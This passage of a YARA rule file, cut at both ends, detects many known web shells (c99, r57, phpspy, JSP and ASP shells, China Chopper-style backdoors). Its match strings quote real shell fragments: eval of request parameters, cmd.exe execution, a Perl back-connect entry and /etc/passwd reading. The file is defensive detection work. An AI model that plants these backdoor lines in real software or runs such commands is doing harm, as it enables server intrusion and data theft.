        hash25 = "ab77e4d1006259d7cbc15884416ca88c"
        hash26 = "71097537a91fac6b01f46f66ee2d7749"
        hash27 = "2434a7a07cb47ce25b41d30bc291cacc"
        hash28 = "7a4b090619ecce6f7bd838fe5c58554b"
    strings:
        $upload_form = "\"<form action=\\\"\"+SHELL_NAME+\"?o=upload\\\" method=\\\"POST\\\" enctype="
        $reg_query   = "<option value='reg query \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\T"
    condition:
        $upload_form and $reg_query
}
rule phpjackal_php {
    // phpjackal: mixed-case identifiers ("downloaD", "shelL") used by this shell; either is enough.
    meta:
        description = "Semi-Auto-generated  - file phpjackal.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "ab230817bcc99acb9bdc0ec6d264d76f"
    strings:
        $dl    = "$dl=$_REQUEST['downloaD'];"
        $perl  = "else shelL(\"perl.exe $name $port\");"
    condition:
        any of them
}
rule webshell_shell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_arabicspy_PHPSPY_hkrkoz {
    // phpspy lineage super-rule: the $mainpath explode line and the "action" GET dispatcher guard.
    meta:
        description = "Web Shell - from files shell.php, phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, arabicspy.php, PHPSPY.php, hkrkoz.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "791708057d8b429d91357d38edf43cc0"
        hash1 = "b68bfafc6059fd26732fa07fb6f7f640"
        hash2 = "42f211cec8032eb0881e87ebdb3d7224"
        hash3 = "40a1f840111996ff7200d18968e42cfe"
        hash4 = "e0202adff532b28ef1ba206cf95962f2"
        hash5 = "0712e3dc262b4e1f98ed25760b206836"
        hash6 = "802f5cae46d394b297482fd0c27cb2fc"
    strings:
        $mainpath = "$mainpath_info           = explode('/', $mainpath);" fullword
        $action   = "if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == \"d"
    condition:
        $mainpath and $action
}
rule WebShell_Moroccan_Spamers_Ma_EditioN_By_GhOsT {
    // PHP mailer script: attachment base64 chunking, progress line, and its empty-form guard.
    meta:
        description = "PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php"
        author = "Florian Roth"
        hash = "31e5473920a2cc445d246bc5820037d8fe383201"
    strings:
        $chunk = "$content = chunk_split(base64_encode($content)); " fullword
        $send  = "print \"Sending mail to $to....... \"; " fullword
        $guard = "if (!$from && !$subject && !$message && !$emaillist){ " fullword
    condition:
        $chunk and $send and $guard
}
rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_2 {
    // "PHP Emperor" safe-mode bypass: /etc/passwd option, author e-mail, open_basedir probe.
    meta:
        description = "PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
        author = "Florian Roth"
        hash = "8fdd4e0e87c044177e9e1c97084eb5b18e2f1c25"
    strings:
        $passwd   = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
        $mail     = "xb5@hotmail.com</FONT></CENTER></B>\");" fullword
        $basedir  = "$v = @ini_get(\"open_basedir\");" fullword
        $credit   = "by PHP Emperor<xb5@hotmail.com>" fullword
    condition:
        2 of ($passwd, $mail, $basedir, $credit)
}
rule WebShell_Generic_PHP_8 {
    // Shared $cmd dispatcher branches ("file", "upload", "downl") and form markup of
    // three related PHP shells; three of the six fragments are required.
    meta:
        description = "PHP Webshells Github Archive - from files Macker's Private PHPShell.php, PHP Shell.php, Safe0ver Shell -Safe Mod Bypass By Evilc0der.php"
        author = "Florian Roth"
        super_rule = 1
        hash0 = "fc1ae242b926d70e32cdb08bbe92628bc5bd7f99"
        hash1 = "9ad55629c4576e5a31dd845012d13a08f1c1f14e"
        hash2 = "c4aa2cf665c784553740c3702c3bfcb5d7af65a3"
    strings:
        $cmd_file   = "elseif ( $cmd==\"file\" ) { /* <!-- View a file in text --> */" fullword
        $cmd_upload = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
        $note       = "/* I added this to ensure the script will run correctly..." fullword
        $form_end   = "<!--    </form>   -->" fullword
        $form_start = "<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\">" fullword
        $cmd_downl  = "elseif ( $cmd==\"downl\" ) { /*<!-- Save the edited file back to a file --> */" fullword
    condition:
        3 of ($cmd_*, $note, $form_*)
}
rule Webshell_acid_AntiSecShell_3 {
    // Acid / AntiSecShell: the "Delete" option builder and the unreadable-file permission printer.
    meta:
        description = "Detects Webshell Acid"
        author = "Florian Roth"
        reference = "https://github.com/nikicat/web-malware-collection"
        date = "2016-01-11"
        score = 70
        hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
        hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
        hash3 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
        hash4 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
        hash5 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
        hash6 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
        hash7 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
        hash8 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
        hash9 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
        hash10 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
        hash11 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
        hash12 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
        hash13 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
        hash14 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
        hash15 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
        hash16 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
        hash17 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
        hash18 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
    strings:
        $del_opt = "echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">Delete</option>\";" ascii fullword
        $perms   = "if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}" ascii fullword
    condition:
        $del_opt and $perms and filesize < 900KB
}
rule webshell_webshells_new_make2 {
    // make2.php: single-line prologue (error_reporting off, session start, UTF-8 header) with no whitespace.
    meta:
        description = "Web shells - generated from file make2.php"
        author = "Florian Roth"
        date = "2014/03/28"
        hash = "9af195491101e0816a263c106e4c145e"
        score = 50
    strings:
        $prologue = "error_reporting(0);session_start();header(\"Content-type:text/html;charset=utf-8"
    condition:
        $prologue
}
rule webshell_jsp_jshell {
    // jshell.jsp: five short byte sequences taken from the sample (non-ASCII text as it
    // appears in the rule source; treated here as opaque markers). All five are required.
    meta:
        description = "Web Shell - file jshell.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "124b22f38aaaf064cef14711b2602c06"
    strings:
        $m0 = "kXpeW[\"" fullword
        $m4 = "[7b:g0W@W<" fullword
        $m5 = "b:gHr,g<" fullword
        $m8 = "RhV0W@W<" fullword
        $m9 = "S_MR(u7b" fullword
    condition:
        all of ($m*)
}
rule down_rar_Folder_down {
    // down.asp: the NetBIOS-name output line from its host-info section.
    meta:
        description = "Webshells Auto-generated - file down.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "db47d7a12b3584a2e340567178886e71"
    strings:
        $netbios = "response.write \"<font color=blue size=2>NetBios Name: \\\\\"  & Snet.ComputerName &"
    condition:
        $netbios
}
rule Casus15_php_php {
    // Casus15 (Turkish-language PHP shell): upload copy, banner echo, and a form label; any one suffices.
    meta:
        description = "Semi-Auto-generated  - file Casus15.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "5e2ede2d1c4fa1fcc3cbfe0c005d7b13"
    strings:
        $copy   = "copy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_na"
        $banner = "echo \"<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'"
        $label  = "value='Calistirmak istediginiz "
    condition:
        any of them
}
rule Weevely_Webshell : webshell {
    // Weevely agent: a "<?php" at offset 0, four-letter variable names, str_replace-based
    // decoding, a 70-char alphanumeric blob, and a tight size window (571..799 bytes).
    meta:
        description = "Weevely Webshell - Generic Rule - heavily scrambled tiny web shell"
        author = "Florian Roth"
        reference = "http://www.ehacking.net/2014/12/weevely-php-stealth-web-backdoor-kali.html"
        date = "2014/12/14"
        score = 60
    strings:
        $hdr = "<?php" ascii
        $w0 = /\$[a-z]{4} = \$[a-z]{4}\("[a-z][a-z]?",[\s]?"",[\s]?"/ ascii
        $w1 = /\$[a-z]{4} = str_replace\("[a-z][a-z]?","","/ ascii
        $w2 = /\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\)\)\); \$[a-z]{4}\(\);/ ascii
        $w4 = /\$[a-z]{4}="[a-zA-Z0-9]{70}/ ascii
    condition:
        filesize > 570 and filesize < 800 and $hdr at 0 and all of ($w*)
}
rule webshell_c99_c66_c99_shadows_mod_c99shell {
    // c99shell family super-rule: self-delete message, bundled Perl back-connect / datapipe
    // entries, the layout table, and c99getsource() error paths. Two of six required.
    meta:
        description = "Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
        hash1 = "0f5b9238d281bc6ac13406bb24ac2a5b"
        hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
        hash3 = "048ccc01b873b40d57ce25a4c56ea717"
    strings:
        $selfdel   = "  if (unlink(_FILE_)) {@ob_clean(); echo \"Thanks for using c99shell v.\".$shv"
        $backconn  = "  \"c99sh_backconn.pl\"=>array(\"Using PERL\",\"perl %path %host %port\")," fullword
        $table     = "<br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#66"
        $getsrc_a  = "   elseif (!$data = c99getsource($bind[\"src\"])) {echo \"Can't download sources"
        $datapipe  = "  \"c99sh_datapipe.pl\"=>array(\"Using PERL\",\"perl %path %localport %remotehos"
        $getsrc_b  = "   elseif (!$data = c99getsource($bc[\"src\"])) {echo \"Can't download sources!"
    condition:
        2 of ($selfdel, $backconn, $table, $getsrc_a, $datapipe, $getsrc_b)
}
rule webshell_wsb_idc {
    // idc.php: md5-compared GET credentials, and eval() of the "idc" GET parameter. Either line fires.
    meta:
        description = "Web Shell - file idc.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "7c5b1b30196c51f1accbffb80296395f"
    strings:
        $auth = "if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)" fullword
        $eval = "{eval($_GET['idc']);}" fullword
    condition:
        $auth or $eval
}
rule cmdjsp_jsp {
    // cmdjsp.jsp: the OS-dispatch comment, the Runtime.exec("cmd.exe /C ...") line,
    // the file name and the author's domain. Two of four required.
    meta:
        description = "Semi-Auto-generated  - file cmdjsp.jsp.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "b815611cc39f17f05a73444d699341d4"
    strings:
        $note   = "// note that linux = cmd and windows = \"cmd.exe /c + cmd\" " fullword
        $exec   = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
        $fname  = "cmdjsp.jsp"
        $domain = "michaeldaw.org" fullword
    condition:
        2 of ($note, $exec, $fname, $domain)
}
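rule webshell_PHP_150 {
    // 150.php: an eval(gzinflate(base64_decode('...'))) loader plus the start of its base64 payload.
    meta:
        description = "Web Shell - file 150.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "400c4b0bed5c90f048398e1d268ce4dc"
    strings:
        // Looks like the first bytes of the sample's base64 blob (sample-specific).
        $blob   = "HJ3HjqxclkZfp"
        // Deliberately NOT 'fullword': YARA rejects a fullword match when the byte after
        // the match is alphanumeric, and the byte after the opening quote here is the first
        // base64 character of the payload. With 'fullword' this string could never match a
        // file in which the payload directly follows "('" - i.e. the loader shape this rule
        // targets - and 'all of them' then kept the whole rule from firing.
        $loader = "<? eval(gzinflate(base64_decode('"
    condition:
        $blob and $loader
}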
rule multiple_webshells_0031 {
    // r57 lineage super-rule: MSSQL temp-table queries and an English UI string; any one fires.
    meta:
        description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        super_rule = 1
        was = "_r577_php_php_r57_php_php_spy_php_php_s_php_php"
        hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
        hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
        hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
        hash3 = "817671e1bdc85e04cc3440bbd9288800"
    strings:
        $select = "$res = mssql_query(\"select * from r57_temp_table\",$db);" fullword
        $label  = "'eng_text30'=>'Cat file'," fullword
        $drop   = "@mssql_query(\"drop table r57_temp_table\",$db);" fullword
    condition:
        any of them
}
rule webshell_Dx_Dx {
    // Dx.php: its "view file as is" tip and the "POST (php eval)" menu cell; either fires.
    meta:
        description = "Web Shell - file Dx.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
    strings:
        $tip  = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
        $menu = "class=linelisting><nobr>POST (php eval)</td><"
    condition:
        $tip or $menu
}
rule webshell_jsp_zx {
    // zx.jsp: one-liner that writes a file under the web application when the "f" parameter is set.
    meta:
        description = "Web Shell - file zx.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "67627c264db1e54a4720bd6a64721674"
    strings:
        $writer = "if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.g"
    condition:
        $writer
}
rule webshell_jsp_guige {
    // guige.jsp: the damapath/content null-check preceding its file write.
    meta:
        description = "Web Shell - file guige.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "2c9f2dafa06332957127e2c713aacdd2"
    strings:
        $check = "if(damapath!=null &&!damapath.equals(\"\")&&content!=null"
    condition:
        $check
}
rule Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php {
    // Same "PHP Emperor" safe-mode bypass as WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_2,
    // keyed on its UI text instead; any single string fires.
    meta:
        description = "Semi-Auto-generated  - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "49ad9117c96419c35987aaa7e2230f63"
    strings:
        $welcome = "Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy"
        $title   = "Mode Shell v1.0</font></span>"
        $loaded  = "has been already loaded. PHP Emperor <xb5@hotmail."
    condition:
        any of them
}
rule webshell_400_in_JFolder_jfolder01_jsp_leo_warn_webshell_nc {
    // JFolder family super-rule: folder-listing builder, size formatter, "cqqUploadFile"
    // upload handle and the hidden cmd field. Two of four required.
    meta:
        description = "Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "36331f2c81bad763528d0ae00edf55be"
        hash1 = "793b3d0a740dbf355df3e6f68b8217a4"
        hash2 = "8979594423b68489024447474d113894"
        hash3 = "ec482fc969d182e5440521c913bab9bd"
        hash4 = "f98d2b33cd777e160d1489afed96de39"
        hash5 = "4b4c12b3002fad88ca6346a873855209"
        hash6 = "e9a5280f77537e23da2545306f6a19ad"
        hash7 = "598eef7544935cf2139d1eada4375bb5"
    strings:
        $folder = "sbFolder.append(\"<tr><td >&nbsp;</td><td>\");" fullword
        $size   = "return filesize / intDivisor + \".\" + strAfterComma + \" \" + strUnit;" fullword
        $upload = "FileInfo fi = (FileInfo) ht.get(\"cqqUploadFile\");" fullword
        $cmd    = "<input type=\"hidden\" name=\"cmd\" value=\"<%=strCmd%>\">" fullword
    condition:
        2 of ($folder, $size, $upload, $cmd)
}
rule shell_php_php {
    // "phpshell"-style shell: parent-dir comment, tempnam() scratch file, and the
    // ereg-based "cd" handler; any single string fires.
    meta:
        description = "Semi-Auto-generated  - file shell.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "1a95f0163b6dea771da1694de13a3d8d"
    strings:
        $parent = "/* We have found the parent dir. We must be carefull if the parent " fullword
        $tmp    = "$tmpfile = tempnam('/tmp', 'phpshell');"
        $cd     = "if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {" fullword
    condition:
        any of them
}
rule FSO_s_indexer_2 {
    // indexer.asp (Turkish defacement tool): the "Nerden" form row.
    meta:
        description = "Webshells Auto-generated - file indexer.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "135fc50f85228691b401848caef3be9e"
    strings:
        $row = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>"
    condition:
        $row
}
rule webshell_jsp_tree {
    // tree.jsp: the "selectChild.action" tree widget plus a basePath line that reads like a
    // common JSP template prologue - on its own the latter would be weak, so both are required.
    meta:
        description = "Web Shell - file tree.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "bcdf7bbf7bbfa1ffa4f9a21957dbcdfa"
    strings:
        $tree     = "$('#tt2').tree('options').url = \"selectChild.action?checki"
        $basepath = "String basePath = request.getScheme()+\"://\"+request.getServerName()+\":\"+requ"
    condition:
        $tree and $basepath
}
rule webshell_mumaasp_com {
    // mumaasp.com.asp: one opaque fragment from the sample (apparently an encoded script body).
    meta:
        description = "Web Shell - file mumaasp.com.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "cce32b2e18f5357c85b6d20f564ebd5d"
    strings:
        $frag = "&9K_)P82ai,A}I92]R\"q!C:RZ}S6]=PaTTR"
    condition:
        $frag
}
rule webshell_webshells_new_asp1 {
    // asp1.asp: reads a request parameter named chr(97) ("a"), reverses it and passes it to
    // ExecuteGlobal; the usage URL carries the reversed payload ")0(tseuqer%20lave". Either fires.
    meta:
        description = "Web shells - generated from file asp1.asp"
        author = "Florian Roth"
        date = "2014/03/28"
        score = 70
        hash = "b63e708cd58ae1ec85cf784060b69cad"
    strings:
        $usage = " http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave " fullword
        $exec  = " <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>" fullword
    condition:
        $usage or $exec
}
rule WebShell_Uploader {
    // Uploader.php: drops the uploaded file as "entrika.php" (same marker as uploader_php_php below).
    meta:
        description = "PHP Webshells Github Archive - file Uploader.php"
        author = "Florian Roth"
        hash = "e216c5863a23fde8a449c31660fd413d77cce0b7"
    strings:
        $drop = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
    condition:
        $drop
}
rule asp_proxy : webshell {
    // Laudanum proxy.asp: query-string rebuilding, response-header iteration, URL reassembly
    // and the Microsoft.XMLHTTP object. All six fragments and a size cap are required.
    meta:
        description = "Laudanum Injector Tools - file proxy.asp"
        author = "Florian Roth"
        reference = "http://laudanum.inguardians.com/"
        date = "2015-06-22"
        hash = "51e97040d1737618b1775578a772fa6c5a31afd8"
    strings:
        $p1 = "'response.write \"<br/>  -value:\" & request.querystring(key)(j)" ascii fullword
        $p2 = "q = q & \"&\" & key & \"=\" & request.querystring(key)(j)" ascii fullword
        $p3 = "for each i in Split(http.getAllResponseHeaders, vbLf)" ascii fullword
        $p4 = "'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)" ascii fullword
        $p5 = "s = urlscheme & urlhost & urlport & urlpath" ascii fullword
        $p6 = "Set http = Server.CreateObject(\"Microsoft.XMLHTTP\")" ascii fullword
    condition:
        all of ($p*) and filesize < 50KB
}
rule ZXshell2_0_rar_Folder_nc {
    // nc.exe shipped in ZXshell2.0.rar: the WSOCK32 import name plus three fragments that look
    // like artefacts of a packed/overlapping binary. All four required; no PE header check is made.
    meta:
        description = "Webshells Auto-generated - file nc.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "2cd1bf15ae84c5f6917ddb128827ae8b"
    strings:
        $ws    = "WSOCK32.dll"
        $frag1 = "?bSUNKNOWNV"
        $frag2 = "p@gram Jm6h)"
        $frag3 = "ser32.dllCONFP@"
    condition:
        $ws and all of ($frag*)
}
rule phpspy_2005_full {
    // phpspy_2005_full.php: the "?downfile=" link cell from its directory listing.
    meta:
        description = "Webshells Auto-generated - file phpspy_2005_full.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "d1c69bb152645438440e6c903bac16b2"
    strings:
        $downlink = "echo \"  <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco"
    condition:
        $downlink
}
rule webshell_caidao_shell_hkmjj {
    // hkmjj.asp: the encoded payload string. Subtracting 3 from every byte yields
    //   If request("xx")="x" then eval request("hkmjj") end if
    // i.e. a China Chopper-style eval backdoor keyed on the "hkmjj" parameter.
    meta:
        description = "Web Shell - file hkmjj.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "e7b994fe9f878154ca18b7cde91ad2d0"
    strings:
        $encoded = "codeds=\"Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\"  " fullword
    condition:
        $encoded
}
rule backup_php_often_with_c99shell {
    // backup.php (DB dumper bundled with c99shell): phpMyAdmin-style dump header,
    // the connect-then-octet-stream line, and the "#Database:" line. All three required.
    meta:
        description = "Semi-Auto-generated  - file backup.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "aeee3bae226ad57baf4be8745c3f6094"
    strings:
        $hdr  = "#phpMyAdmin MySQL-Dump" fullword
        $conn = ";db_connect();header('Content-Type: application/octetstr"
        $db   = "$data .= \"#Database: $database" fullword
    condition:
        $hdr and $conn and $db
}
rule JspWebshell_1_2_jsp {
    // JspWebshell 1.2: product name, folder-op error text, an env table cell, and the
    // hard-coded "111" password. Two of four required.
    meta:
        description = "Semi-Auto-generated  - file JspWebshell 1.2.jsp.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "70a0ee2624e5bbe5525ccadc467519f6"
    strings:
        $name   = "JspWebshell"
        $err    = "CreateAndDeleteFolder is error:"
        $envtd  = "<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryHashtable(\"java.c"
        $passwd = "String _password =\"111\";"
    condition:
        2 of ($name, $err, $envtd, $passwd)
}
rule webshell_asp_ajn {
    // ajn.asp: writes out a second script ("seal.write ...") that creates WScript.Shell
    // and saves a downloaded zip to c:\. Both lines required.
    meta:
        description = "Web Shell - file ajn.asp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "aaafafc5d286f0bff827a931f6378d04"
    strings:
        $wsh  = "seal.write \"Set WshShell = CreateObject(\"\"WScript.Shell\"\")\" & vbcrlf" fullword
        $save = "seal.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreateOve"
    condition:
        $wsh and $save
}
rule webshell_2_520_icesword_job_ma1_ma4_2 {
    // JSP file-manager family super-rule: text-file extension table, upload input markup,
    // and the password/session gate. All three required.
    meta:
        description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "64a3bf9142b045b9062b204db39d4d57"
        hash1 = "9abd397c6498c41967b4dd327cf8b55a"
        hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
        hash3 = "56c005690da2558690c4aa305a31ad37"
        hash4 = "532b93e02cddfbb548ce5938fe2f5559"
        hash5 = "6e0fa491d620d4af4b67bae9162844ae"
        hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
    strings:
        $types  = "private String[] _textFileTypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\","
        $upfile = "\\\" name=\\\"upFile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typ"
        $gate   = "if (request.getParameter(\"password\") == null && session.getAttribute(\"passwor"
    condition:
        $types and $upfile and $gate
}
rule FSO_s_tool {
    // tool.asp: the doubly-quoted %windir%\calc.exe argument from its example/test command.
    meta:
        description = "Webshells Auto-generated - file tool.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "3a1e1e889fdd974a130a6a767b42655b"
    strings:
        $calc = "\"\"%windir%\\\\calc.exe\"\")"
    condition:
        $calc
}
rule remview_2003_04_22 {
    // remview: the localized "Eval PHP code" label built through its mm() translation helper.
    meta:
        description = "Webshells Auto-generated - file remview_2003_04_22.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "17d3e4e39fbca857344a7650f7ea55e3"
    strings:
        $eval_label = "\"<b>\".mm(\"Eval PHP code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\""
    condition:
        $eval_label
}
rule Test_php_php {
    // Test.php: write-test probe ("test" line written via fwrite) and the "HACKed by EntriKa" tag; any one fires.
    meta:
        description = "Semi-Auto-generated  - file Test.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "77e331abd03b6915c6c6c7fe999fcb50"
    strings:
        $yazi   = "$yazi = \"test\" . \"\\r\\n\";" fullword
        $fwrite = "fwrite ($fp, \"$yazi\");" fullword
        $tag    = "$entry_line=\"HACKed by EntriKa\";" fullword
    condition:
        any of them
}
rule FeliksPack3___PHP_Shells_r57 {
    // r57.php (FeliksPack3): LOAD DATA INFILE built from the "test3_file" POST field.
    meta:
        description = "Webshells Auto-generated - file r57.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "903908b77a266b855262cdbce81c3f72"
    strings:
        $loaddata = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']."
    condition:
        $loaddata
}
rule WebShell_hiddens_shell_v1 {
    // hiddens shell v1: the opening "<?$d='..." of its encoded payload (sample-specific blob).
    meta:
        description = "PHP Webshells Github Archive - file hiddens shell v1.php"
        author = "Florian Roth"
        hash = "1674bd40eb98b48427c547bf9143aa7fbe2f4a59"
    strings:
        $payload = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
    condition:
        $payload
}
rule connector {
    // connector.asp: DDoS-bot style controller; attack-type branch and the "victims / zombies" comment.
    meta:
        description = "Webshells Auto-generated - file connector.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "3ba1827fca7be37c8296cd60be9dc884"
    strings:
        $attack  = "If ( AttackID = BROADCAST_ATTACK )"
        $zombies = "Add UNIQUE ID for victims / zombies"
    condition:
        $attack and $zombies
}
rule fire2013 : webshell
{
    // fire2013: eval() whose argument is a hex-escaped "eval(gzinfla..." string; the second
    // string is the tail of the base64 payload with the escaped closing ")));". Both required.
    meta:
        author      = "Vlad https://github.com/vlad-s"
        date        = "2016/07/18"
        description = "Catches a webshell"
    strings:
        $head = "eval(\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61"
        $tail = "yc0CJYb+O//Xgj9/y+U/dd//vkf'\\x29\\x29\\x29\\x3B\")"
    condition:
        $head and $tail
}
rule WebShell_php_webshells_spygrup {
    // spygrup.php (KingDefacer): author e-mail in footer, $root taken from POST, a Turkish
    // "already displayed" message, and the credit line. Three of four required.
    meta:
        description = "PHP Webshells Github Archive - file spygrup.php"
        author = "Florian Roth"
        hash = "12f9105332f5dc5d6360a26706cd79afa07fe004"
    strings:
        $footer = "kingdefacer@msn.com</FONT></CENTER></B>\");" fullword
        $root   = "if($_POST['root']) $root = $_POST['root'];" fullword
        $shown  = "\".htmlspecialchars($file).\" Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>" fullword
        $credit = "By KingDefacer From Spygrup.org>" fullword
    condition:
        3 of ($footer, $root, $shown, $credit)
}
rule HawkEye_PHP_Panel {
    // HawkEye keylogger drop panel: tiny script (< 600 bytes) that takes fname/data from GET,
    // unlinks fname and echoes "Success". All four lines required.
    meta:
        description = "Detects HawkEye Keyloggers PHP Panel"
        author = "Florian Roth"
        date = "2014/12/14"
        score = 60
    strings:
        $p0 = "$fname = $_GET['fname'];" ascii fullword
        $p1 = "$data = $_GET['data'];" ascii fullword
        $p2 = "unlink($fname);" ascii fullword
        $p3 = "echo \"Success\";" ascii fullword
    condition:
        filesize < 600 and all of ($p*)
}
rule webshell_404_data_in_JFolder_jfolder01_xxx {
    // JFolder family super-rule: the "cqq" command-output textarea filled from sbCmd.
    meta:
        description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, suiyue.jsp, warn.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
